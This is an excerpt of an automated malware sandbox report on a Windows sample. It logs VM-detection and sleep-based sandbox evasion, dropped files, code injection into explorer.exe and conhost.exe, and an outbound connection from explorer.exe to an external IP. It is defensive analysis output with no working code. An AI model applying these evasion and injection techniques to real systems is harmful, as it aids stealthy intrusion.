                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3816Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4922Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3288
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5155
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 6791Jump to behavior
                Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 3208Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5765Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2803Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6880
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 517
                Source: C:\Program Files\MINA\m.exeDropped PE file which has not been started: C:\Windows\Temp\wbiwcikhpmwr.tmpJump to dropped file
                Source: C:\Program Files\MINA\m.exeDropped PE file which has not been started: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 3816 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep count: 4922 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 3288 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 5155 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6780Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272Thread sleep count: 5765 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep count: 2803 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 5952Thread sleep count: 129 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 6880 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136Thread sleep count: 517 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: m.exe, 00000006.00000000.2090382414.00007FF7C880B000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: K^SX9Y_1HWQVMCIg
                Source: explorer.exe, 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000D.00000002.4476974328.0000000001280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000007.00000002.2122566660.000001F7BE869000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2971180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,10_2_00007FF6B2971180
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B299531C SetUnhandledExceptionFilter,WideCharToMultiByte,10_2_00007FF6B299531C
                Source: C:\Windows\System32\conhost.exeCode function: 10_2_00007FF6B2986741 SetUnhandledExceptionFilter,10_2_00007FF6B2986741

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 44.196.193.227 10128Jump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\Program Files\MINA\m.exeMemory written: PID: 6444 base: 1182010 value: 00Jump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Program Files\MINA\m.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonlyJump to behavior
                Source: C:\Program Files\MINA\m.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: readonlyJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Program Files\MINA\m.exeThread register set: target process: 6728Jump to behavior
                Source: C:\Program Files\MINA\m.exeThread register set: target process: 6444Jump to behavior
                Writes to foreign memory regions
                Source: C:\Program Files\MINA\m.exeMemory written: C:\Windows\System32\conhost.exe base: 1284A0A010Jump to behavior
                Source: C:\Program Files\MINA\m.exeMemory written: C:\Windows\explorer.exe base: 1182010Jump to behavior
